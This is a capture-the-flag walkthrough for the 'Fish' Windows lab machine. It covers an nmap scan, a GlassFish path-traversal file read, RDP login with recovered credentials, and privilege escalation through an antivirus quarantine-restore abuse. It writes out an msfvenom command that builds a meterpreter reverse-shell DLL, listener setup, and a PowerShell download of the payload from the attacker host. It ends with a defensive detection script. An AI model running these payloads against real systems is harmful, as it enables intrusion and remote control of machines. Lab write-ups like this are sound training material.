
Fish Walkthrough

Platform: Offsec | PG Practice
Difficulty: Intermediate
OS: Windows
Author: Pawan Kumar (Vulntricks)


🛰️ 1. Scanning

PORT      STATE SERVICE              REASON          VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fishyyy
| Issuer: commonName=Fishyyy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-29T04:54:04
| Not valid after: 2022-04-30T04:54:04
| MD5: 588e:de0b:ff8c:3e4a:cec6:f67d:24cb:6575
| SHA-1: a80d:768d:a75e:6cbf:c992:be2b:2b80:5b6c:331b:4c08
| rdp-ntlm-info:
| Target_Name: FISHYYY
| NetBIOS_Domain_Name: FISHYYY
| NetBIOS_Computer_Name: FISHYYY
| DNS_Domain_Name: Fishyyy
| DNS_Computer_Name: Fishyyy
| Product_Version: 10.0.19041
|_ System_Time: 2021-10-30T05:09:01+00:00
|_ssl-date: 2021-10-30T05:09:17+00:00; -3y340d05h52m55s from scanner time.
3700/tcp open giop syn-ack ttl 125
| fingerprint-strings:
| GetRequest, X11Probe:
| GIOP
| giop:
| GIOP
| (IDL:omg.org/SendingContext/CodeBase:1.0
| 169.254.99.240
| 169.254.99.240
|_ default
4848/tcp open http syn-ack ttl 125 Sun GlassFish Open Source Edition 4.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-title: Login
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: B0072A41A4A7027F185EE05F78C7B971
5040/tcp open unknown syn-ack ttl 125
6060/tcp open x11? syn-ack ttl 125
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"425-1267803922000"
| Last-Modified: Fri, 05 Mar 2010 15:45:22 GMT
| Content-Type: text/html
| Content-Length: 425
| Date: Sat, 30 Oct 2021 05:06:28 GMT
| Connection: close
| Server: Synametrics Web Server v7
| <html>
| <head>
| <META HTTP-EQUIV="REFRESH" CONTENT="1;URL=app">
| </head>
| <body>
| <script type="text/javascript">
| <!--
| currentLocation = window.location.pathname;
| if(currentLocation.charAt(currentLocation.length - 1) == "/"){
| window.location = window.location + "app";
| }else{
| window.location = window.location + "/app";
| //-->
| </script>
| Loading Administration console. Please wait...
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 403
| Cache-Control: private
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Set-Cookie: JSESSIONID=0984AA8E65F19F930C67728EEA1E576D; Path=/
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 5028
| Date: Sat, 30 Oct 2021 05:06:29 GMT
| Connection: close
| Server: Synametrics Web Server v7
| <!DOCTYPE html>
| <html>
| <head>
| <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
| <title>
| SynaMan - Synametrics File Manager - Version: 5.1 - build 1595
| </title>
| <meta NAME="Description" CONTENT="SynaMan - Synametrics File Manager" />
| <meta NAME="Keywords" CONTENT="SynaMan - Synametrics File Manager" />
| <meta http-equiv="X-UA-Compatible" content="IE=10" />
| <link rel="icon" type="image/png" href="images/favicon.png">
| <link type="text/css" rel="stylesheet" href="images/AjaxFileExplorer.css">
| <link rel="stylesheet" type="text/css"
| JavaRMI:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Length: 145
| Date: Sat, 30 Oct 2021 05:06:23 GMT
| Connection: close
| Server: Synametrics Web Server v7
|_ <html><head><title>Oops</title><body><h1>Oops</h1><p>Well, that didn't go as we had expected.</p><p>This error has been logged.</p></body></html>
7676/tcp open java-message-service syn-ack ttl 125 Java Message Service 301
8080/tcp open http syn-ack ttl 125 Sun GlassFish Open Source Edition 4.1
|_http-title: Data Web
|_http-server-header: GlassFish Server Open Source Edition 4.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
8181/tcp open ssl/http syn-ack ttl 125 Sun GlassFish Open Source Edition 4.1
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US/organizationalUnitName=GlassFish/localityName=Santa Clara
| Issuer: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US/organizationalUnitName=GlassFish/localityName=Santa Clara
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2014-08-21T13:30:10
| Not valid after: 2024-08-18T13:30:10
| MD5: 594f:8111:2179:0c71:532a:00ab:223e:0e8a
| SHA-1: 1ff8:eff1:b17d:c744:191e:213a:3102:9aa7:5982:a63c
|_ssl-date: TLS randomness does not represent time
|_http-title: Data Web
|_http-server-header: GlassFish Server Open Source Edition 4.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
8686/tcp open java-rmi syn-ack ttl 125 Java RMI
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @169.254.99.240:8686
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49723/tcp open http syn-ack ttl 125 JBoss Enterprise Application Platform
| http-methods:
|_ Supported Methods: GET
|_http-title: Site doesn't have a title.
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 53168/tcp): CLEAN (Couldn't connect)
| Check 2 (port 63680/tcp): CLEAN (Couldn't connect)
| Check 3 (port 28564/udp): CLEAN (Failed to receive data)
| Check 4 (port 20524/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -1436d05h52m55s, deviation: 0s, median: -1436d05h52m55s
| smb2-time:
| date: 2021-10-30T05:09:02
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

2. Enumeration

We'll enumerate the services from the scan results, working from bottom to top.

SMB enumeration

SMB does not seem to allow a NULL session.

HTTP enumeration (port 4848)

The server redirects directly to a login portal.


While looking for exploits, I found this Metasploit module for path traversal.

We only need to provide the RHOST and the file that we want to read.

Running the module confirms that we can read the file.

What we need to do now is find useful information on the Windows server.

It looks like we can traverse to any path and read its contents too.

Looking further into the readable files.

Now I have a password and a user.

Initial Access

Using the found username and password we can RDP into the machine.

└─$ xfreerdp3 /u:arthur /p:'KingOfAtlantis' /v:192.168.238.168 /timeout:6000  

Privilege escalation

While looking through the running processes, this AV stands out.

Checking it with searchsploit turned up this exploit.

Below are the instructions for executing the exploit.

As per the exploit details:

1. Create a malicious DLL.
2. Start a listener on our Kali machine.
3. Put the malicious DLL in a folder on the Windows machine.
4. Scan it with the antivirus.
5. Put it in quarantine once the threat is found.
6. Use the tool CreateMountPoint.exe to create a mount point to the .NET Framework directory.
7. Restore the file from the antivirus quarantine.
8. Restart the machine.

Create malicious DLL

In this case we create the DLL using msfvenom.

└─$ msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.45.157 LPORT=4443 -f dll > condo_exploit.dll

Start the listener on the Kali machine.

msf > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.45.157
LHOST => 192.168.45.157
msf exploit(multi/handler) > set LPORT 4443
LPORT => 4443

Download the exploit

 iwr -uri http://192.168.45.157/condo_exploit.dll -Outfile version.dll


Scan the DLL file with the antivirus.

Put it in quarantine, so the folder becomes empty.

Create a mount point using CreateMountPoint.exe.

Once the mount point is created, you can restore the file from the antivirus quarantine and it will be written to the mounted location.

Restart the machine to execute the exploit.


We get the shell as soon as it executes.
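For defenders, the technique above leaves two artefacts on the host: a reparse point (junction / mount point) under a user-writable folder whose target is a protected directory, and a DLL under the .NET Framework tree that Microsoft did not sign. The PowerShell below is an added example (not part of the original walkthrough, nor code from the exploit it references) that reports both; the directory lists at the top are assumptions to adjust per host.

```powershell
# Added defender-side check (not from the original write-up). Run elevated on the
# Windows host. $ScanRoots and $ProtectedRoots are assumptions; tune them per host.
$ProtectedRoots = @('C:\Windows\Microsoft.NET', 'C:\Windows\System32', 'C:\Program Files')
$ScanRoots      = @('C:\Users', 'C:\ProgramData', 'C:\Temp')

# 1. Reparse points under user-writable trees whose target lands inside a protected
#    directory. Windows ships legitimate junctions in C:\Users (e.g. "Application Data"),
#    but those point back into the user tree, not into $ProtectedRoots.
$reparseFindings = Get-ChildItem -Path $ScanRoots -Recurse -Force `
        -Attributes Directory+ReparsePoint -ErrorAction SilentlyContinue |
    ForEach-Object {
        # .Target is string[] on Windows PowerShell 5.1 and string on PowerShell 7
        $target = ($_.Target | Select-Object -First 1)
        if ($target -and ($ProtectedRoots | Where-Object { $target -like "$_*" })) {
            [pscustomobject]@{
                Finding = 'ReparsePointIntoProtectedDir'
                Path    = $_.FullName
                Target  = $target
            }
        }
    }

# 2. DLLs inside the .NET Framework directories that are unsigned or not signed by
#    Microsoft. A restored DLL written through a mount point shows up here as a
#    non-Microsoft file next to signed framework binaries.
$dllFindings = Get-ChildItem -Path 'C:\Windows\Microsoft.NET' -Filter '*.dll' `
        -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notlike '*Microsoft*') {
            [pscustomobject]@{
                Finding = 'UnsignedOrThirdPartyDll'
                Path    = $_.FullName
                Status  = $sig.Status
                Signer  = $sig.SignerCertificate.Subject
            }
        }
    }

# Print both lists; an empty result for both is the expected state on a clean host.
@($reparseFindings) + @($dllFindings) | Format-Table -AutoSize
```

Treat the output as a review list rather than a verdict: a few unsigned helper DLLs can be normal on some builds, but any reparse point whose target is a protected directory, or a freshly timestamped non-Microsoft DLL in the framework tree, warrants a closer look.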